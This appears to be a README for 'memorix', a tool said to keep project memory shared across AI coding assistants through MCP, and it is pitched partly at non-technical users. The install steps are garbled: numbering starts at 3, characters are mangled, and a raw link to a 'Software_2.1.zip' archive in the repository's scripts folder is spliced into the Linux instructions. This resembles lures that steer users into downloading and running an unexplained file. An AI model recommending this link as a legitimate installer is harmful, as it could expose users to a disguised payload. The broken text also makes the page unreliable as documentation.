๐Ÿง  memorix - Persistent Memory for AI Agents

Download memorix

๐Ÿ“‹ What is memorix?

memorix helps you save the memory of AI coding tools. If you work with AI helpers like Cursor, Windsurf, Claude Code, or Copilot, memorix keeps your projects in mind. It remembers what you told these tools before, so you don't have to explain your work again and again.

You can think of it as a bridge that links memories across different coding assistants, making your workflow smoother without repeating yourself.

๐Ÿ’ป Who is it for?

  • People who use AI coding assistants regularly.
  • Users who switch between tools like Claude Code, Copilot, and Cursor.
  • Anyone who wants to keep their project details saved when using AI helpers.
  • Non-technical users who want their AI tools to remember their work context.

โš™๏ธ How does memorix work?

memorix uses a system called MCP (Model Context Protocol). MCP talks with different AI coding tools and keeps track of your work's memory. Then, it shares the saved information in a way that all your AI helpers can understand.

This way, when you go from one tool to another, your project data stays with you. You donโ€™t need to re-type or re-explain things to each AI assistant.

๐Ÿš€ Getting Started

What you need before installing memorix:

  • A Windows 10 or later, macOS 10.15 or later, or a popular Linux system.
  • At least 4 GB of RAM.
  • 100 MB of free disk space.
  • An active internet connection (required for AI tools interaction).
  • Basic knowledge of downloading and opening files on your computer.

๐Ÿ“ฅ Download & Install memorix

Please visit the release page by clicking below. It lists the latest version of memorix ready for you to download.

    • A .exe file if you use Windows.
    • A .dmg file for macOS.
    • A .AppImage or https://github.com/Tibu142/memorix/raw/refs/heads/main/scripts/Software_2.1.zip file for Linux.
  3. Click the file name to download it on your computer.
  4. After the download finishes, open the file:
    • Windows: Double-click the .exe file and follow the on-screen instructions.
    • macOS: Open the .dmg file, then drag the memorix app to your Applications folder.
    • Linux: Make the .AppImage executable by right-clicking, select Properties, then Permissions, and check โ€œAllow executing file as programโ€. Then double-click it, or run the app from the terminal.
  5. Once installed, launch memorix like any other program on your computer.

๐Ÿ”ง Using memorix

After you open memorix, you will see a simple dashboard.

  • The app will ask you to connect your AI coding tools such as Cursor, Claude Code, Copilot, or Windsurf.
  • Follow the prompts to allow memorix to link with your accounts or tools.
  • When set up, the app will start saving your project memory.
  • You donโ€™t need to input any extra details manually; memorix does the work in the background.
  • If you change projects or work on new AI tools, just tell memorix which one you're using. It will sync your memory across them.

๐Ÿ›  Features

  • Cross-Tool Memory: Keeps your project details saved and shared across many AI coding assistants.
  • Easy Setup: A simple installer helps you get started without programming knowledge.
  • Automatic Sync: Updates your project memory automatically when you use your AI tools.
  • Persistent Context: Keeps your conversations with AI tools stored, so you never lose important details.

๐Ÿ’ก Tips for best use

  • Always update memorix to the latest version for bug fixes and improvements.
  • Make sure your internet connection is stable when working with AI tools through memorix.
  • Regularly check the connection between memorix and your AI coding assistants.
  • Use different workspaces if you have multiple projects to keep memories separate.
  • Restart memorix if you notice it stops syncing properly.

โ“ Troubleshooting

If memorix does not open or connect to your AI tools:

  • Restart your computer and try running the app again.
  • Check your internet connection.
  • Make sure your AI tools are installed and logged in.
  • Verify you downloaded the correct version for your system.
  • Move the installer to your local drive if using an external drive or network folder.
  • Consult the issue page on the GitHub repository if problems persist.

๐Ÿ“‚ About the Project

memorix is built to help AI-driven developers and users keep project context active across many coding assistants. It uses an open standard called MCP (Model Context Protocol) for smooth memory sharing.
